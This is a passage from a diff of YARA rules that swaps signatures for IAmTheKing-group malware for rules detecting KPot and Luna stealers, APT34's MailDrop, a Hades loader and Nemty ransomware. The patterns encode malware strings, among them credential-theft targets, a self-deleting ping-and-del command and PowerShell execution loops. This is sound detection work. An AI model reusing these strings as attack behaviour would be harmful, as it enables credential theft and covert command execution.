"f110ebee387c2dfac08beb674a8efec20940bc562c5231e9bb4a90296476c29f" + hash1 = "a962501ea4cd363dd588c948ff8b0ab24aa4132ff58f4a7806af06efa3b791ef" + hash2 = "1c2975dd464d014502a46ba6383943c7de4635e3664011653217dc424d53f8fe" + hash3 = "e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507" tlp = "White" - adversary = "IAmTheKing" + adversary = "RAAS" strings: - $s1 = "send request error:%d" fullword ascii - $s2 = "cookie size :%d" fullword wide - $s3 = "querycode error" fullword wide - $s4 = { 7b 27 73 65 73 73 69 6f 6e 27 3a 5b 7b 27 6e 61 6d 65 27 3a 27 [1-10] 27 2c 27 69 64 27 3a [1-6] 2c 27 74 69 6d 65 27 3a [3-10] 7d 5d 2c 27 6a 70 67 27 3a } - $s5 = "PmMytex%d" fullword wide - $s6 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 4c 00 65 00 6e 00 67 00 74 00 68 00 3a 00 20 00 25 00 49 00 36 00 34 00 75 00 0d 00 0a } - $s7 = { 25 00 73 00 5c 00 25 00 73 00 2e 00 6c 00 6f 00 67 } - $s8 = { 25 00 73 00 5f 00 25 00 63 00 25 00 63 00 25 00 63 00 25 00 63 00 5f 00 25 00 64 } + $s1 = { 2f 63 20 22 70 69 6e 67 20 30 2e 30 2e 30 2e 30 26 64 65 6c 20 22 } + $s2 = { 7b 45 4e 43 52 59 50 54 53 54 41 52 54 7d 7b } + $s3 = { 7b 45 4e 43 52 59 50 54 45 4e 44 45 44 7d } + $s4 = { 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 45 58 54 45 4e 41 54 49 4f 4e 53 5c 5c 5c 00 ff ff ff ff 17 00 00 00 2f 2f 2f 45 4e 44 20 43 4f 4d 4d 41 4e 44 53 20 4c 49 53 54 5c 5c 5c 00 ff ff ff ff 1d 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 4b 49 4c 4c 20 4c 49 53 54 5c 5c 5c 00 00 00 ff ff ff ff 1c 00 00 00 2f 2f 2f 45 4e 44 20 53 45 52 56 49 43 45 53 20 53 54 4f 50 20 4c 49 53 54 5c 5c 5c 00 00 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 50 52 4f 43 45 53 53 45 53 20 57 48 49 54 45 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 1e 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 49 4c 45 53 20 4c 49 53 54 5c 5c 5c 00 00 ff ff ff ff 20 00 00 00 2f 2f 2f 45 4e 44 20 55 4e 45 4e 43 52 59 50 54 20 46 4f 4c 44 45 52 53 20 4c 49 53 54 5c 5c 5c } + $s5 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 } + $s6 = { 3c 25 55 4e 44 45 43 52 59 50 54 5f 44 41 54 45 54 49 4d 45 25 3e } + $s7 = { 25 00 73 00 20 00 28 00 25 00 73 00 2c 00 20 00 6c 00 69 00 6e 00 65 00 20 00 25 00 64 00 29 } condition: - uint16(0)==0x5a4d and filesize >100KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >80KB and 6 of ($s*) } -rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_2 : FILE +rule ARKBIRD_SOLG_MAL_Kpot_Oct_2020_1 : FILE { meta: - description = "Detect PowerPool malware (ALPC exploit variant)" + description = "Detect KPot stealer (new variant October 2020)" author = "Arkbird_SOLG" - id = "2988e9a8-da43-51fb-bd39-44aa1d161120" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_2.yara#L1-L23" + id = "316feeb3-59e5-5d18-9800-db41fabd6cb0" + date = "2020-10-17" + modified = "2020-10-17" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-17/MAL_KPot_Oct_2020_1.yar#L1-L40" license_url = "N/A" - logic_hash = "07d7a6444ddccbf4887de18659147354c9961092bb07ee0148392035a6d27086" + logic_hash = "20010e8f2d45f904911664edee710f4dca18327c2b80766c253970a50624d13c" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "035f97af0def906fbd8f7f15fb8107a9e852a69160669e7c0781888180cd46d5" - hash2 = "a72cdb6be7a967d3aa0021d2331b61af84455539e6f127720c9aac9b8392ec24" - hash3 = "df7b9d972ac83cc4a590f09d74cb242de3442cc9c1f19ed08f62bd6ebc9fc0fd" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "028ec268176707aadc2cf8e65a28236cbed214f9fd65fc3346ee34e859e50057" strings: - $s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } - $s2 = { 2f 00 3f 00 69 00 64 00 3d 00 25 00 73 00 26 00 69 00 6e 00 66 00 6f 00 3d 00 25 00 73 } - $s3 = { 72 00 61 00 72 00 2e 00 65 00 78 00 65 00 20 00 61 00 20 00 2d 00 72 00 20 00 25 00 73 00 2e 00 72 00 61 00 72 00 20 00 2d 00 74 00 61 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 20 00 2d 00 74 00 62 00 25 00 30 00 34 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 00 25 00 30 00 32 00 64 } - $s4 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 24 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 54 00 61 00 62 00 6c 00 65 00 2e 00 50 00 53 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 } - $s5 = { 63 00 6d 00 64 00 20 00 2f 00 63 00 20 00 70 00 6f 00 77 00 65 00 72 00 73 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 } - $s6 = { 83 c4 04 53 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 0c 56 68 [2] 42 00 ba c8 ?? 43 00 e8 ?? a9 ff ff 83 c4 08 83 7c 24 20 00 68 40 01 00 00 74 61 33 ed 55 68 88 ?? 43 00 e8 ?? a4 00 00 b8 50 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 3b cd 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 3b cd 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 90 ?? 42 00 f3 a4 e8 [2] 00 00 83 c4 04 33 f6 89 74 24 20 eb 66 6a 00 68 88 ?? 43 00 e8 ?? a4 00 00 b8 f0 ?? 42 00 83 c4 0c 8b d0 66 8b 08 83 c0 02 66 85 c9 75 f5 bf 88 ?? 43 00 2b c2 83 c7 fe 8d 64 24 00 66 8b 4f 02 83 c7 02 66 85 c9 75 f4 8b c8 c1 e9 02 8b f2 f3 a5 8b c8 83 e1 03 68 98 ?? 42 00 f3 a4 e8 ?? 95 00 00 c7 44 24 24 01 00 00 00 8b 74 24 24 83 c4 04 33 ed 68 d0 07 00 00 a3 d4 ?? 42 00 } + $olds1 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" fullword ascii + $olds2 = "%s\\%s\\%s\\%.6s_%d.dat" fullword wide + $olds3 = "%s\\%s\\%s-Qt" fullword wide + $olds4 = "%s\\%s\\%.6ss" fullword wide + $olds5 = "%s\\%s\\%s.vdf" fullword wide + $olds6 = "https://%S/a/%S" fullword wide + $olds7 = { 4e 00 61 00 6d 00 65 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 43 00 6f 00 6d 00 6d 00 65 00 6e 00 74 00 3a 00 20 00 25 00 6c 00 73 00 0d 00 0a 00 55 00 73 00 65 00 72 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 44 00 61 00 74 00 61 00 3a 00 20 00 0d 00 0a 00 00 00 00 00 25 00 32 00 2e 00 32 00 58 00 20 00 00 00 00 00 25 00 2d 00 35 00 30 00 73 00 20 00 25 00 73 } + $debug1 = "4|Remote Desktop|%s|%s|%s|" fullword ascii + $debug2 = "1|TotalCommander|%s|%s|%s|" fullword ascii + $debug3 = "1|FileZilla|%s:%s|%s|%S|" fullword ascii + $debug4 = "5|Windows Mail|%s|%s|%s|" fullword ascii + $debug5 = "5|Outlook|%s:%d|%s|%s|" fullword ascii + $debug6 = "1|WS_FTP|%s|%s|%S|" fullword ascii + $debug7 = "1|WinSCP|%s|%s|%s|" fullword ascii + $debug8 = "3|Pidgin|%s|%s|%s|" fullword ascii + $debug9 = "3|Psi(+)|%s|%s|%s|" fullword ascii + $debug10 = "2|EarthVPN||%s|%s|" fullword ascii + $debug11 = "2|NordVPN||%s|%s|" fullword ascii + $debug12 = "0|%s|%S|%s|%s|%s" fullword ascii + $debug13 = "0|%S|%s|%s|%s|%S" fullword ascii + $debug14 = "0|%s|%s|%s|%s|" fullword ascii + $debug15 = "Masked|%s|%02d/%04d|%s|%s|%s" fullword ascii + $op1 = "{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1" fullword ascii + $op2 = { 25 73 0d 0a 25 73 0d 0a 56 69 73 69 74 73 20 63 6f 75 6e 74 3a 20 25 64 0d 0a 4c 61 73 74 20 76 69 73 69 74 3a 20 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 5d 0d 0a 0d 0a 00 42 72 6f 77 73 65 72 73 5c 48 69 73 74 6f 72 79 5c 25 73 2e 74 78 74 00 42 72 6f 77 73 65 72 73 5c 41 75 74 6f 66 69 6c 6c 5c 25 73 2e 74 78 74 00 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 25 73 2e 74 78 74 } + $op3 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii + $op4 = "monero-project" fullword ascii condition: - uint16(0)==0x5a4d and filesize >100KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >120KB and 4 of ($olds*) and 10 of ($debug*) and 2 of ($op*) } -rule ARKBIRD_SOLG_MAL_Queenofclubs_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT_34_Maildrop_Mar_2021_1 : FILE { meta: - description = "Detect QueenOfClubs malware" + description = "Detect MailDrop malware used by APT34" author = "Arkbird_SOLG" - id = "d78df760-5753-528c-b03d-7bb91ec658c0" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfClubs_Jul_2021_1.yara#L1-L21" + id = "a17c4e0b-9bbb-594d-8551-5c146e6a601e" + date = "2021-04-03" + modified = "2021-04-09" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-03/APT34/APT_APT_34_MailDrop_Mar_2021_1.yar#L1-L24" license_url = "N/A" - logic_hash = "c6fe9dd24098ef3c281d9e6727613499988c88b9d2011af77390e0ce358bebf4" + logic_hash = "f55192044bf8e190dfdc18aeaac543a5022643ea242e75ff2492939ae6e1814c" score = 75 quality = 75 tags = "FILE" - hash1 = "b0a1da4fc5526365df495094f65660d88487ce5e60192e5fb4075e815f9481d3" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "d6b876d72dba94fc0bacbe1cb45aba493e4b71572a7713a1a0ae844609a72504" + hash2 = "ebae23be2e24139245cc32ceda4b05c77ba393442482109cc69a6cecc6ad1393" strings: - $s1 = { 66 00 6f 00 72 00 28 00 3b 00 3b 00 29 00 7b 00 24 00 53 00 3d 00 47 00 65 00 74 00 2d 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 20 00 22 00 25 00 73 00 22 00 3b 00 49 00 46 00 28 00 24 00 53 00 29 00 7b 00 22 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 69 00 65 00 78 00 20 00 24 00 53 00 20 00 32 00 3e 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 24 00 74 00 2b 00 27 00 20 00 27 00 3b 00 65 00 63 00 68 00 6f 00 20 00 24 00 74 00 20 00 3e 00 3e 00 22 00 25 00 73 00 22 00 3b 00 7d 00 73 00 6c 00 65 00 65 00 70 00 20 00 2d 00 6d 00 20 00 36 00 30 00 30 00 3b 00 7d } - $s2 = { 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 2d 00 6e 00 6f 00 70 00 20 00 2d 00 63 00 20 00 25 00 73 } - $s3 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } - $s4 = { 5c 00 7e 00 74 00 6d 00 70 00 5f 00 [6-20] ( 00 2e 00 6a 00 70 00 67 | 00 2e 00 70 00 73 00 31) } - $s5 = { c7 45 d8 ac 89 41 00 c7 45 dc 00 00 00 00 6a 01 68 00 00 40 04 8d 55 d8 52 68 c8 89 41 00 68 e0 89 41 00 8b 45 c0 83 c0 08 50 68 ec 89 41 00 8b 4d f4 51 ff 15 78 62 41 00 8b 55 c0 89 42 04 8b 45 c0 83 78 04 00 75 19 8b 4d f0 51 ff 15 74 62 41 00 8b 55 f4 52 ff 15 74 62 41 00 e9 14 ff ff ff 68 3c 04 00 00 e8 b7 70 00 00 83 c4 04 89 45 d0 8b 45 d0 89 45 e0 68 ec 01 00 00 e8 a1 70 00 00 83 c4 04 89 45 cc 8b 4d cc 89 4d d4 8b 55 c0 8b 32 b9 7b 00 00 00 8b 7d d4 f3 a5 6a 01 8b 45 c0 83 c0 1c 50 68 ec 01 00 00 8b 4d d4 51 68 c1 f5 09 00 8b 55 c0 83 c2 20 52 e8 04 ef ff ff } - $s6 = "http://bot.google.com" fullword ascii - $s7 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 00 00 25 00 73 00 00 00 00 00 25 00 73 } + $EWSInitCom = { 7e ?? 00 00 04 28 ?? 00 00 06 ?? 4f [0-3] 02 7b ?? 00 00 04 28 ?? 00 00 06 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 02 7b ?? 00 00 04 28 ?? 00 00 06 72 ?? 00 00 70 28 ?? 00 00 0a 28 ?? 00 00 06 02 7b ?? 00 00 04 6f ?? 00 00 06 7e ?? 00 00 04 72 ?? 00 00 70 28 ?? 00 00 06 7e 06 00 00 04 28 ?? 00 00 06 [2-4] 00 00 [3-4] 00 00 [3] 00 00 [3] 00 00 [3] 00 00 } + $EWSCom = { 13 30 ?? 00 ?? 00 00 00 00 00 00 00 02 28 ?? 00 00 ?? 02 03 05 0e 04 0e 05 0e 06 [0-4] 73 ?? 00 00 06 7d ?? 00 00 04 04 [2-6] 00 00 ?? 02 ?? 7d ?? 00 00 04 [0-2] 02 ?? 7d ?? 00 00 04 [2-4] 00 00 [0-18] 04 02 28 ?? 00 00 06 2a } + $EWSDecrypt = { 13 30 03 00 27 00 00 00 ?? 00 00 11 0f 00 20 00 01 00 00 16 28 ?? 00 00 06 28 ?? 00 00 06 0a 0f 00 1f 10 16 28 ?? 00 00 06 0b 02 06 07 28 ?? 00 00 06 2a } + $EWSRandomData = { 1b 30 ?? 00 ?? 00 00 00 ?? 00 00 11 02 19 28 ?? 00 00 0a 0a 16 0b ?? 35 [0-3] 06 16 6a 16 6f ?? 00 00 0a 26 06 6f ?? 00 00 0a d4 8d ?? 00 00 01 0c 7e ?? 00 00 04 08 6f ?? 00 00 0a 06 08 16 06 6f ?? 00 00 0a b7 6f ?? 00 00 0a 07 17 d6 0b 07 1f 32 32 c6 [5-11] 06 6f ?? 00 00 0a dc 2a [0-1] 01 10 00 00 02 00 08 00 } + $s1 = "HMicrosoft Office/15.0 (Windows NT {0}; Microsoft Outlook 15.0.4675; Pro)" fullword ascii + $s2 = "https://{0}/ews/exchange.asmx" fullword wide + $s3 = "Send_Log" fullword ascii + $s4 = "CheckEWSConnection" fullword ascii + $s5 = "Done:D" fullword wide + $s6 = "ExecAllCmds" fullword ascii + $s7 = "ExchangeUri" fullword ascii + $s8 = "get_cmdSubject" fullword ascii condition: - uint16(0)==0x5a4d and filesize >35KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >20KB and 2 of ($EWS*) and 5 of ($s*) } -rule ARKBIRD_SOLG_MAL_Slothfulmedia_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Loader_Hades_Dec_2020_1 : FILE { meta: - description = "Detect SlothfulMedia malware" + description = "Detect the loader used by Hades ransomware for load the final implant in memory" author = "Arkbird_SOLG" - id = "f4e1eca6-ecc9-5911-b69e-c8c4de43f1a1" - date = "2021-07-09" - modified = "2021-07-12" - reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_SlothfulMedia_Jul_2021_1.yara#L1-L26" + id = "d48d3a2b-3f0f-5da2-aba9-db2366489a6c" + date = "2020-12-27" + modified = "2021-01-01" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-01/Hades/Ran_Loader_Hades_Dec_2020_1.yar#L2-L24" license_url = "N/A" - logic_hash = "929364cbb9854336641590d53ee9c4548f02845e26252d359b155e4c2b1032ca" - score = 75 - quality = 73 + logic_hash = "cfa0f8acd3c526f7f4889794f7c38547a88031bb615a03ad5c1542c61bc0eecd" + score = 50 + quality = 71 tags = "FILE" - hash1 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb" - hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae" - hash3 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00" + hash2 = "ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d" + level = "Experimental" strings: - $s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } - $s2 = "\\VarFileInfo\\Translation" fullword wide - $s3 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 } - $s4 = "\\SetupUi" fullword wide - $s5 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 } - $s6 = { 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 25 00 73 00 25 00 64 } - $s7 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 } - $s8 = { 45 00 72 00 61 00 20 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3a 00 25 00 73 00 20 00 25 00 64 } - $s9 = "ExtKeyloggerStart" fullword ascii - $s10 = "ExtKeyloggerStop" fullword ascii - $s11 = "ExtServiceDelete" fullword ascii + $seq1 = { 48 83 ec 58 8b 0d 9e aa 1c 00 ba 01 14 00 00 ff 15 93 9a 1c 00 48 85 c0 74 07 33 c0 e9 c1 3b 00 00 48 8b 05 58 99 1c 00 48 89 44 24 30 c7 44 24 3c 2c 01 00 00 c7 44 24 38 01 00 00 00 33 c9 ff 15 cb 99 1c 00 48 89 05 74 aa 1c 00 48 8b 05 6d aa 1c 00 48 63 48 3c 48 8b 05 62 aa 1c 00 48 03 c1 48 89 05 88 aa 1c 00 48 8d 44 24 3c 48 89 44 24 28 48 8d 05 a7 aa 1c 00 48 89 44 24 20 4c 8d 4c 24 38 45 33 c0 48 8d 15 53 aa 1c 00 48 8b 0d e4 ac 1c 00 ff 54 24 30 48 85 c0 74 05 e8 5e ff ff ff 48 8d 05 2d 3d 00 00 48 89 05 38 aa 1c 00 48 8b 05 31 aa 1c 00 } + $seq2 = { 89 54 24 10 89 4c 24 08 48 83 ec 18 8b 44 24 20 89 04 24 8b 44 24 28 89 44 24 04 8b 44 24 04 39 04 24 73 0f c7 44 24 20 04 00 00 00 8b 04 24 eb 0e eb 0c c7 44 24 20 35 00 00 00 8b 44 24 04 48 83 c4 18 } + $seq3 = { 48 8b 05 c1 ?? 1c 00 48 89 05 32 ?? 1c 00 } + $s1 = "111111111\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}" fullword wide + $s2 = "_VERSION_INFO" fullword wide + $s3 = "VkKeyScanW" fullword ascii + $s4 = { 53 43 61 4d 69 72 } condition: - uint16(0)==0x5a4d and filesize >20KB and 8 of ($s*) + uint16(0)==0x5a4d and filesize >300KB and 2 of ($seq*) and 3 of ($s*) } -rule ARKBIRD_SOLG_MAL_Keylogger_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Nemty_June_2021_1 : FILE { meta: - description = "Detect a keylogger used by IAmTheKing group" + description = "Detect Nemty ransomware" author = "Arkbird_SOLG" - id = "186dc5f5-5cc2-551a-a34c-e775085e7f89" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_Keylogger_Jul_2021_1.yara#L1-L22" + id = "1c7994b8-7479-5679-91a5-e3ca4b2e7fde" + date = "2021-06-12" + modified = "2021-06-13" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-12/Nemty/RAN_Nemty_June_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "dfdf5892564b93cd1bf564cfe62e37d9477b5ae0bf20e0f9a44ee97b7e3a99f8" + logic_hash = "25a9e82ae1e950e1c71d6dfa120efd1a2ba39cbf8e9c2cd4ba4e67ce7dabc45e" score = 75 - quality = 71 + quality = 75 tags = "FILE" - hash1 = "4c6995cb65ffeac1272d296eb3273b9fbca7f4d603312a5085b5c3be96154915" - hash2 = "79d363a163dfb0088545e66404e0213a9e18d5ee66713d7bc906ed97c46b5ca3" - tlp = "White" - adversary = "IAmTheKing" + hash1 = "45e35c9b095871fbc9b85afff4e79dd36b7812b96a302e1ccc65ce7668667fe6" + hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390" + hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3" + tlp = "white" + adversary = "RAAS" strings: - $s1 = "sonme hting is wrong x" fullword ascii - $s2 = { 25 73 25 73 25 73 25 73 } - $s3 = { 0d 0a 5b 44 41 54 41 5d 3a 0d 0a 00 4c 6f 67 2e 74 78 74 } - $s4 = { 0d 0a 5b 54 49 4d 45 3a 5d 25 64 2f 25 64 2f 25 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 0d 0a 5b 54 49 54 4c 45 3a 5d } - $s5 = { 25 73 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 } - $s6 = { 6a 00 56 ff 75 f8 8d 45 e4 50 ff 75 f0 ff 75 f4 ff 75 08 ff 15 c4 80 40 00 8b f0 3b f7 74 12 56 ff 15 70 80 40 00 85 c0 75 1b 56 ff 15 78 } + $s1 = { 83 f8 1a 0f 8d [2] 00 00 [0-1] 89 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [1-15] 00 00 00} + $s2 = { 5a 4c 49 42 00 00 00 00 00 00 01 ?? 78 01 54 8f [3] 40 [2] cf } + $s3 = { 4c 24 [1-2] 89 54 24 [1-2] 89 ?? 24 [12-25] 00 81 } + $s4 = { ff ff [0-1] 8d 05 [3] 00 [0-1] 89 04 24 [0-1] c7 44 24 ?? 02 00 00 00 e8 [2] ff ff e8 [2] ff ff [0-1] 8b 4c 24 } condition: - uint16(0)==0x5a4d and filesize >25KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >500KB and all of ($s*) } -rule ARKBIRD_SOLG_MAL_Kingofhearts_Jul_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Luna_Stealer_Apr_2021_1 : FILE { meta: - description = "Detect KingOfHearts malware" + description = "Detect Luna stealer (also Mercurial Grabber)" author = "Arkbird_SOLG" - id = "b1efb4db-3864-5fdc-a3a0-992734eaf22f" - date = "2021-07-09" - modified = "2021-07-12" - reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_KingOfHearts_Jul_2021_1.yara#L1-L21" + id = "2fecce99-5869-5de0-afae-6dc245748fa6" + date = "2021-08-29" + modified = "2021-08-30" + reference = "https://github.com/NightfallGT/Mercurial-Grabber" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Luna/MAL_Luna_Stealer_Apr_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "6761958760997030693c832c75098890b0d6d34fd6fe9c60d68d611497d57419" + logic_hash = "934ded815c262fa8bee38638e17ed8c2b1f0dcad28037bf1d525e11bf7e34dce" score = 75 - quality = 50 + quality = 75 tags = "FILE" - hash1 = "0639e8f5e517c3f57d28bfd9f51cabfb275c64b7bca224656c2ac04f5a8c3af0" - hash2 = "0340a90ed4000e579c29f6ad7d4ab2ae1d30f18a2e777689e3e576862efbd6e0" - hash3 = "393ccb9853ea7628792e4dd982c2dd52dd8f768fdb7b80b20cbfc2fac4e298a4" + hash1 = "a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18" + hash2 = "93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f" + hash3 = "0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21" + hash4 = "ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a" tlp = "White" - adversary = "IAmTheKing" + adversary = "-" strings: - $s1 = { 43 00 72 00 65 00 61 00 74 00 65 00 44 00 6f 00 77 00 6e 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 46 00 61 00 69 00 6c 00 65 00 64 00 2c 00 45 00 72 00 72 00 6f 00 72 00 3d 00 25 00 64 } - $s2 = { 43 00 72 00 65 00 61 00 74 00 65 00 55 00 70 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 } - $s3 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii - $s4 = "\\1-driver-vmsrvc" fullword ascii - $s5 = { 73 74 61 72 74 20 64 6f 77 6e 3a 20 25 73 0a } - $s6 = { 66 00 69 00 6c 00 65 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 22 00 25 00 73 00 22 } + $s1 = { 73 ?? 00 00 0a 0b 07 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 0a 6f ?? 00 00 0a 0c 08 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a 0d 09 6f ?? 00 00 0a 0a 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 